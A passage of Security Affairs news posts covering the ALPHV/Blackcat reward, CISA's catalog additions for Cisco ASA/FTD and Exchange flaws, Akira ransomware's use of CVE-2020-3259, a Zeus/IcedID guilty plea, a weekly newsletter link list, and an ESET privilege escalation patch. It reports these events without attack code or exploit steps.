The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation, it amassed hundreds of millions of dollars in ransom payments.  

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

People who have information eligible for the reward can access the following Tor website set up by the US Department of State: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion. 

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ALPHV/Blackcat ransomware)

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

• CVE-2020-3259 Cisco ASA and FTD Information Disclosure Vulnerability
• CVE-2024-21410 Microsoft Exchange Server Privilege Escalation Vulnerability

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The vulnerability CVE-2024-21410 is a bypass vulnerability that can be exploited by an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication(EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by March 7, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

CISA warns that the Akira Ransomware gang is exploiting the Cisco ASA/FTD vulnerability CVE-2020-3259 (CVSS score: 7.5) in attacks in the wild.

This week the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco ASA and FTD bug, tracked as CVE-2020-3259 (CVSS score: 7.5), to its Known Exploited Vulnerabilities catalog.

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The issue was listed by CISA as known to be used in ransomware campaigns, but the agency did not reveal which ransomware groups are actively exploiting the issue.

In January, researchers from cybersecurity firm Truesec reported that the Akira ransomware group exploited the vulnerability in attacks targeting Cisco Cisco ASA and FTD appliances.

“During the past weeks, the Truesec CSIRT team found forensic data indicating that the Akira Ransomware group might be actively exploiting an old Cisco ASA (Adaptive Security Appliance) and FTD (Firepower Threat Defence) vulnerability tracked as CVE-2020-3259.” reads the report published by Truesec.

An attacker can trigger the vulnerability to extract sensitive data from the memory of the affected devices, including usernames and passwords.

The researchers analyzed eight incidents involving the Akira ransomware and confirmed that the flaw in Cisco Anyconnect SSL VPN was the entry point in at least six of the compromised devices. 

“When the vulnerability was made public in 2020, no known public exploits were available. However, there are now indications that this vulnerability might be actively exploited.” continues the report.

The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability CVE-2020-3259 by March 7, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

A Ukrainian national pleaded guilty to his role in the Zeus and IcedID operations, which caused tens of millions of dollars in losses.

Ukrainian national Vyacheslav Igorevich Penchukov has pleaded guilty to his key roles in the Zeus and IcedID malware operations.

“Vyacheslav Igorevich Penchukov was a leader of two prolific malware groups that infected thousands of computers with malicious software. These criminal groups stole millions of dollars from their victims and even attacked a major hospital with ransomware, leaving it unable to provide critical care to patients for over two weeks,” said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department’s Criminal Division. “Before his arrest and extradition to the United States, the defendant was a fugitive on the FBI’s most wanted list for nearly a decade. Today’s guilty pleas should serve as a clear warning: the Justice Department will never stop in its pursuit of cybercriminals.”

On October 2022, Swiss police arrested Penchukov in Geneva, also known as Tank, which is one of the leaders of the JabberZeus cybercrime group.

The man was extradited to the United States in 2023, he was included in the FBI’s “Most Wanted” list and has been sought for 10 years.

In 2012, the Ukrainian national Vyacheslav Igorevich Penchukov was accused of being a member of a cybercrime gang known as JabberZeus crew. JabberZeus was a small cybercriminal ring that was targeting SMBs with a custom-made version of the Zeus banking trojan. At the time, DoJ accused Penchukov of coordinating the exchange of stolen banking credentials and money mules and received alerts once a bank account had been compromised.

The popular investigator Brian Krebs reported that Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham, noted in 2014 that Tank told co-conspirators in a JabberZeus chat on July 22, 2009 that his daughter, Miloslava, was and told him Miloslava birth weight.

Warner explained that Tank was identified by searching Ukrainian birth records for the only girl named Miloslava born on that day with a specific birth weight.

Krebs pointed out that Penchukov was able to evade prosecution by Ukrainian authorities for many years due to his political connections. The late son of former Ukrainian President Victor Yanukovych would serve as godfather to Tank’s daughter Miloslava.

Two other members of the gang, Yevhen Kulibaba and Yuriy Konovalenko, were arrested in 2014 and pleaded guilty. Both were sentenced to two years and ten months of incarceration in May 2015 followed by a supervised release of 1 year.

Since May 2019, Penchukov had a prominent role in the Zeus operation. From at least November 2018 through February 2021, Penchukov helped lead a conspiracy that infected victim computers with IcedID or Bokbot.

Penchukov faces up to 20 years in prison for each count, he is scheduled to be sentenced on May 9.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, IcedID Malware)

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes

CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks

CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalogUS gov offers a reward of up to $10M for info on ALPHV/Blackcat gang leaders

U.S. CISA: hackers breached a state government organization

Russia-linked Turla APT uses new TinyTurla-NG backdoor to spy on Polish NGOs

US Gov dismantled the Moobot botnet controlled by Russia-linked APT28

A cyberattack halted operations at Varta production plants

North Korea-linked actors breached the emails of a Presidential Office member

Nation-state actors are using AI services and LLMs for cyberattacks

Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages

Zoom fixed critical flaw CVE-2024-24691 in Windows software

Adobe Patch Tuesday fixed critical vulnerabilities in Magento, Acrobat and Reader

Microsoft Patch Tuesday for February 2024 fixed 2 actively exploited 0-days

A ransomware attack took 100 Romanian hospitals down

Bank of America customer data compromised after a third-party services provider data breach

Ransomfeed – Third Quarter Report 2023 is out!

Global Malicious Activity Targeting Elections is Skyrocketing

Researchers released a free decryption tool for the Rhysida Ransomware

Residential Proxies vs. Datacenter Proxies: Choosing the Right Option

CISA adds Roundcube Webmail Persistent XSS bug to its Known Exploited Vulnerabilities catalog

Canada Gov plans to ban the Flipper Zero to curb car thefts

ExpressVPN leaked DNS requests due to a bug in the split tunneling feature

9 Possible Ways Hackers Can Use Public Wi-Fi to Steal Your Sensitive Data

US Feds arrested two men involved in the Warzone RAT operation

Raspberry Robin spotted using two new 1-day LPE exploits

Cybercrime

International Cybercrime Malware Service Dismantled by Federal Authorities: Key Malware Sales and Support Actors in Malta and Nigeria Charged in Federal Indictments  

As-a-Service tools empower criminals with limited tech skills 

Ransomware Attack Takes 100 Hospitals Offline 

Reward for Information: ALPHV/Blackcat Ransomware as a Service

Foreign National Pleads Guilty to Role in Cybercrime Schemes Involving Tens of Millions of Dollars in Losses      

Malware

RASPBERRY ROBIN KEEPS RIDING THE WAVE OF ENDLESS 1-DAYS

A Method for Decrypting Data Infected with Rhysida Ransomware  

Bypassing EDRs With EDR-Preloading  

Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)

Face Off  

Hacking

Snap Trap: The Hidden Dangers Within Ubuntu’s Package Suggestion System

Disrupting malicious uses of AI by state-affiliated threat actors      

CISA and MS-ISAC Release Advisory on Compromised Account Used to Access State Government Organization

Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

Intelligence and Information Warfare 

Global Malicious Activity Targeting Elections Is Skyrocketing  

Staying ahead of threat actors in the age of AI  

US needs to take China’s cyber-threat to US infrastructure more seriously 

South Korea says presumed North Korean hackers breached personal emails of presidential staffer  

TinyTurla Next Generation – Turla APT spies on Polish NGOs  

Cybersecurity          

LEADERSBuilding a Data Fortress: Data Security and Privacy in the Age of Generative AI and LLMs   

Package Theft Statistics  

After a tip, ExpressVPN acts swiftly to protect customers  

Canada to ban the Flipper Zero to stop surge in car thefts

I’m a cyber expert, these are the five things you need to do to ‘digitally break up’ with someone in the age of login sharing  

THE FEBRUARY 2024 SECURITY UPDATE REVIEW  

Fertility tracker Glow fixes bug that exposed users’ personal data

European Court of Human Rights declares backdoored encryption is illegal

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

Cybersecurity firm ESET has addressed a high-severity elevation of privilege vulnerability in its Windows security solution.

ESET addressed a high-severity vulnerability, tracked as CVE-2024-0353 (CVSS score 7.8), in its Windows products.

The vulnerability is a local privilege escalation issue that was submitted to the company by the Zero Day Initiative (ZDI). According to the advisory, an attacker can misuse ESET’s file operations, as performed by the Real-time file system protection, to delete files without having the proper permission.

“The vulnerability in file operations handling, performed by the Real-time file system protection feature on the Windows operating system, potentially allowed an attacker with an ability to execute low-privileged code on the target system to delete arbitrary files as NT AUTHORITY\SYSTEM, escalating their privileges.” reads the advisory.

ESET is not aware of attacks in the wild exploiting this vulnerability.

Below is the list of impacted programs and versions:

• ESET NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate 16.2.15.0 and earlier
• ESET Endpoint Antivirus for Windows and Endpoint Security for Windows 10.1.2058.0, 10.0.2049.0, 9.1.2066.0, 8.1.2052.0 and earlier from the respective version family
• ESET Server Security for Windows Server (formerly File Security for Microsoft Windows Server) 10.0.12014.0, 9.0.12018.0, 8.0.12015.0, 7.3.12011.0 and earlier from the respective version family
• ESET Mail Security for Microsoft Exchange Server 10.1.10010.0, 10.0.10017.0, 9.0.10011.0, 8.0.10022.0, 7.3.10014.0 and earlier from the respective version family
• ESET Mail Security for IBM Domino 10.0.14006.0, 9.0.14007.0, 8.0.14010.0, 7.3.14004.0 and earlier from the respective version family
• ESET Security for Microsoft SharePoint Server 10.0.15004.0, 9.0.15005.0, 8.0.15011.0, 7.3.15004.0 and earlier from the respective version family
• ESET File Security for Microsoft Azure (all versions)

The cybersecurity firm has released patches to address the issues in NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate, Endpoint Antivirus and Endpoint Security for Windows, Server Security for Windows Server, Mail Security for Exchange Server and IBM Domino, Security for SharePoint Server, File Security for Microsoft Azure.

The security firm hasn’t provided security patches for products that reached their end-of-life (EoL) status.

The company recommended customers patch their products as soon as possible.

Vulnerabilities in security solutions are very dangerous because these issues are difficult to detect and because these software solutions run with high privileges.

In December 2023, the cybersecurity firm addressed a vulnerability (CVE-2023-5594, CVSS score 7.5) in the Secure Traffic Scanning Feature, preventing potential exploitation that could lead web browsers to trust websites using certificates signed with outdated and insecure algorithms.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, privilege escalation)